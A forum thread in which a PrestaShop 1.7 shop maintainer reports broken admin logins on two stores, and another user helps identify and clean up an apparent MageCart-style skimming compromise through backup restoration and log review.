Prestashop 1.7 Admin suddenly broken

[Jurist]

This happened to 2nd of the store I take care of the 2nd day. I am curious if that's a general Prestashop problem now?

The problem is:

• when you go to the admin page of the store and insert correct credentials - nothing happens, page is just reloaded
• when you go to the admin page of the store and insert incorrect credentials - there's no error on the page, 500 server error in JS console.

Either way, you are unable to log in to the store anyway.

The resolution of the problem was restoration of half of the store's folders. I was unable to dig in and investigate which would take time, as I had to have those stores back to work.

Restoration of the following folders helped:

app
bin
classes
controllers
js
admin
tools
var
vendor
webservice

but I am just concerned now, are we being attacked by someone? Why was one of the files damaged, so the admin login was no longer working.

It happened to 2nd separate completely different store, 1st one had a problem on Thursday, 2nd one on Friday. Same problem, same fix. Can't believe it's just a coincidence.

I am looking for help.

[masterblaster]

I had to deal with a similar report lately - Check :

classes/db/Db.php
controllers/admin/AdminLoginController.php

before the restoration and see if there are any lines added in the files that send data via php Curl to a remote server.

In which case yes you have been attacked by some kind of "MageCart" variant.

[Jurist]

Hi @masterblaster,

Thank you for your reply.

I am afraid that we actually have been attacked. The files couldn't damage themselves. 

Do you know which PS version got rid of that vulnerability?

Or does this require a new PR? 

 

[masterblaster]

It's hard to tell,
you should check the access logs carefully to understand the attack vector.
There may have been a vulnerable/outdated module.
 

[Jurist]

@masterblaster

I can confirm that there was 

/app/Mage . php file on both servers.

there was also

/js/vas51cs.js

with a generated name. Looks like magecart attack.

Which PS version eliminated the vulnerability?

Does the malware impact the database data or only the new form users?

[masterblaster]

List of public disclosed PS vulnerabilites is available here ,
as long as there isn't any new exploit in the wild, I would rather
think of an outdated module as an attack vector.

Regarding attack itself, this is known to send plaintext credentials
to remote server + add fake credit card forms during checkout.
Anyway, since attackers got your webspace, the only way to be sure to clean up
the threat is to restore a clean backup and remove the attack vector.

[Jurist]

@masterblaster

thanks for your help.

we did restore large part of the site + removes the files that the script created. 

We will also add some extra security measures to those websites. 

I understand how it works with reading the data from forms, I think that didn't happen because there were no registrations between the time that the problem ocurred and the time it was removed from site.

Do you know if that script reads data from the database? 

[masterblaster]

It seems to me that the main intent of this kind of hack is to steal credit cards.
However, core files are also modified to send logins to remote servers so if you care about your shop perform a dedicated analysis.

[Jurist]

Hi @masterblaster,

Thank you for your help.

We have restored large portion of the store, responsible for communicating DB etc and briefly looked at the malicious code, which appears to be reading data from forms on website and then sends it through PHP curl to some remove server. 

do you have any idea on how to find out what plugin our file served as an attack vector? I was thinking about checking requests log, however due to a large number of users every day, I think it would be difficult to find out.

 

[masterblaster]

Hello,

well I see no other ways other than inspecting logs, given the situation considering hiring a specialist if you can't handle it.